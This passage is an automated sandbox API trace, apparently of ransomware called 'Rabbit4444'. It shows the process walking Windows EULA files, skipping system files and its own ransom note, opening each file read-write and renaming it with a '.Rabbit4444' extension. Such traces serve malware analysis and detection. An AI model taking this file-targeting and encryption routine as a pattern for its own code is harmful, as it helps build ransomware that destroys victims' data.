(lpString1="EULA_cs-cz.htm", lpString2=".") returned 1 [0047.229] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="..") returned 1 [0047.229] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="windows") returned -1 [0047.229] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="bootmgr") returned 1 [0047.229] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="pagefile.sys") returned -1 [0047.229] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="boot") returned 1 [0047.229] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="ids.txt") returned -1 [0047.229] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="NTUSER.DAT") returned -1 [0047.229] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_cs-cz.htm" | out: lpString1="EULA_cs-cz.htm") returned="EULA_cs-cz.htm" [0047.229] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm", dwFileAttributes=0x0) returned 1 [0047.229] lstrlenW (lpString="EULA_cs-cz.htm") returned 14 [0047.229] lstrlenW (lpString="Rabbit4444") returned 10 [0047.229] lstrcmpiW (lpString1="_cs-cz.htm", lpString2="Rabbit4444") returned -1 [0047.229] lstrlenW (lpString=".dll") returned 4 [0047.229] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.229] lstrlenW (lpString=".lnk") returned 4 [0047.229] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.229] lstrlenW (lpString=".ini") returned 4 [0047.229] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.229] lstrlenW (lpString=".sys") returned 4 [0047.230] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.230] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_cs-cz.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.230] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.230] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13854046492) returned 1 [0047.230] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=83315) returned 1 [0047.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0047.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0047.230] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14880, lpName=0x0) returned 0x298 [0047.231] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14880) returned 0x70000 [0047.235] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.235] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0047.235] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.235] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0047.235] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0047.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0047.236] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13854641853) returned 1 [0047.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0047.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0047.236] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.237] CloseHandle (hObject=0x298) returned 1 [0047.237] CloseHandle (hObject=0x278) returned 1 [0047.239] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm.Rabbit4444") returned 63 [0047.239] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_cs-cz.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_cs-cz.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.240] InterlockedExchangeAdd (in: Addend=0xff618, Value=83328 | out: Addend=0xff618) returned 9922848 [0047.240] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3040 [0047.240] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3caf18, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3caf18, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xfe95, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_da-dk.htm", cAlternateFileName="EULA_D~1.HTM")) returned 1 [0047.240] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.240] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.240] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="Rabbit4444.exe") returned -1 [0047.240] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2=".") returned 1 [0047.240] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="..") returned 1 [0047.240] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="windows") returned -1 [0047.240] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="bootmgr") returned 1 [0047.240] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="pagefile.sys") returned -1 [0047.240] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="boot") returned 1 [0047.240] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="ids.txt") returned -1 [0047.241] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="NTUSER.DAT") returned -1 [0047.241] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_da-dk.htm" | out: lpString1="EULA_da-dk.htm") returned="EULA_da-dk.htm" [0047.241] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm", dwFileAttributes=0x0) returned 1 [0047.242] lstrlenW (lpString="EULA_da-dk.htm") returned 14 [0047.242] lstrlenW (lpString="Rabbit4444") returned 10 [0047.242] lstrcmpiW (lpString1="_da-dk.htm", lpString2="Rabbit4444") returned -1 [0047.242] lstrlenW (lpString=".dll") returned 4 [0047.242] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.242] lstrlenW (lpString=".lnk") returned 4 [0047.242] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.242] lstrlenW (lpString=".ini") returned 4 [0047.242] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.242] lstrlenW (lpString=".sys") returned 4 [0047.242] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.242] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_da-dk.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.242] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.242] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13855277042) returned 1 [0047.242] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=65173) returned 1 [0047.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0047.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0047.242] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x101a0, lpName=0x0) returned 0x298 [0047.243] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x101a0) returned 0x70000 [0047.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0047.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0047.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0047.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0047.247] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13855793682) returned 1 [0047.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0047.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0047.247] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.248] CloseHandle (hObject=0x298) returned 1 [0047.248] CloseHandle (hObject=0x278) returned 1 [0047.251] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm.Rabbit4444") returned 63 [0047.251] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_da-dk.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_da-dk.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.251] InterlockedExchangeAdd (in: Addend=0xff618, Value=65184 | out: Addend=0xff618) returned 10006176 [0047.251] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3045 [0047.251] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3d10e9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3d10e9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1133d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_de-de.htm", cAlternateFileName="EULA_D~2.HTM")) returned 1 [0047.251] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.251] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.251] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="Rabbit4444.exe") returned -1 [0047.251] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2=".") returned 1 [0047.251] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="..") returned 1 [0047.251] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="windows") returned -1 [0047.251] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="bootmgr") returned 1 [0047.251] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="pagefile.sys") returned -1 [0047.252] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="boot") returned 1 [0047.252] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="ids.txt") returned -1 [0047.252] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="NTUSER.DAT") returned -1 [0047.252] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_de-de.htm" | out: lpString1="EULA_de-de.htm") returned="EULA_de-de.htm" [0047.252] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm", dwFileAttributes=0x0) returned 1 [0047.252] lstrlenW (lpString="EULA_de-de.htm") returned 14 [0047.252] lstrlenW (lpString="Rabbit4444") returned 10 [0047.252] lstrcmpiW (lpString1="_de-de.htm", lpString2="Rabbit4444") returned -1 [0047.252] lstrlenW (lpString=".dll") returned 4 [0047.252] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.252] lstrlenW (lpString=".lnk") returned 4 [0047.252] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.252] lstrlenW (lpString=".ini") returned 4 [0047.252] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.252] lstrlenW (lpString=".sys") returned 4 [0047.252] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.252] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_de-de.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.252] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.252] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13856317987) returned 1 [0047.252] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=70461) returned 1 [0047.253] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0047.253] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0047.253] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11640, lpName=0x0) returned 0x298 [0047.254] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11640) returned 0x70000 [0047.258] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.258] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0047.258] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.258] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0047.258] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.258] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0047.258] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.258] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0047.258] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13856874738) returned 1 [0047.258] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0047.258] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0047.258] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.259] CloseHandle (hObject=0x298) returned 1 [0047.259] CloseHandle (hObject=0x278) returned 1 [0047.261] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm.Rabbit4444") returned 63 [0047.261] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_de-de.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_de-de.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.262] InterlockedExchangeAdd (in: Addend=0xff618, Value=70464 | out: Addend=0xff618) returned 10071360 [0047.262] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3050 [0047.262] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3d2466, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3d2466, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x3a756, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_el-gr.htm", cAlternateFileName="EULA_E~1.HTM")) returned 1 [0047.262] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.262] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.262] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="Rabbit4444.exe") returned -1 [0047.262] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2=".") returned 1 [0047.262] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="..") returned 1 [0047.262] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="windows") returned -1 [0047.262] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="bootmgr") returned 1 [0047.262] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="pagefile.sys") returned -1 [0047.262] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="boot") returned 1 [0047.262] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="ids.txt") returned -1 [0047.262] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="NTUSER.DAT") returned -1 [0047.262] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_el-gr.htm" | out: lpString1="EULA_el-gr.htm") returned="EULA_el-gr.htm" [0047.262] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm", dwFileAttributes=0x0) returned 1 [0047.263] lstrlenW (lpString="EULA_el-gr.htm") returned 14 [0047.263] lstrlenW (lpString="Rabbit4444") returned 10 [0047.263] lstrcmpiW (lpString1="_el-gr.htm", lpString2="Rabbit4444") returned -1 [0047.263] lstrlenW (lpString=".dll") returned 4 [0047.263] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.263] lstrlenW (lpString=".lnk") returned 4 [0047.263] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.263] lstrlenW (lpString=".ini") returned 4 [0047.263] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.263] lstrlenW (lpString=".sys") returned 4 [0047.263] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.263] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_el-gr.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.263] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.263] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13857398269) returned 1 [0047.263] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=239446) returned 1 [0047.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0047.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0047.264] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3aa60, lpName=0x0) returned 0x298 [0047.265] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3aa60) returned 0x70000 [0047.272] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.272] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0047.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.272] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0047.272] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0047.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0047.272] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13858291473) returned 1 [0047.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0047.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0047.272] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.274] CloseHandle (hObject=0x298) returned 1 [0047.274] CloseHandle (hObject=0x278) returned 1 [0047.280] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm.Rabbit4444") returned 63 [0047.280] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_el-gr.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_el-gr.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.281] InterlockedExchangeAdd (in: Addend=0xff618, Value=239456 | out: Addend=0xff618) returned 10141824 [0047.281] InterlockedExchangeAdd (in: Addend=0xff624, Value=8 | out: Addend=0xff624) returned 3055 [0047.281] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3d5f05, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3d5f05, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xe4b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_en-gb.htm", cAlternateFileName="EULA_E~2.HTM")) returned 1 [0047.281] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.281] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.281] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="Rabbit4444.exe") returned -1 [0047.281] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2=".") returned 1 [0047.281] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="..") returned 1 [0047.281] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="windows") returned -1 [0047.281] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="bootmgr") returned 1 [0047.281] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="pagefile.sys") returned -1 [0047.281] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="boot") returned 1 [0047.281] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="ids.txt") returned -1 [0047.281] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="NTUSER.DAT") returned -1 [0047.281] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_en-gb.htm" | out: lpString1="EULA_en-gb.htm") returned="EULA_en-gb.htm" [0047.281] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm", dwFileAttributes=0x0) returned 1 [0047.282] lstrlenW (lpString="EULA_en-gb.htm") returned 14 [0047.282] lstrlenW (lpString="Rabbit4444") returned 10 [0047.282] lstrcmpiW (lpString1="_en-gb.htm", lpString2="Rabbit4444") returned -1 [0047.282] lstrlenW (lpString=".dll") returned 4 [0047.282] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.282] lstrlenW (lpString=".lnk") returned 4 [0047.282] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.282] lstrlenW (lpString=".ini") returned 4 [0047.282] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.282] lstrlenW (lpString=".sys") returned 4 [0047.282] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.282] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-gb.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.282] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.282] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13859291348) returned 1 [0047.282] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=58549) returned 1 [0047.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0047.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0047.282] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe7c0, lpName=0x0) returned 0x298 [0047.286] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe7c0) returned 0x70000 [0047.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0047.289] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 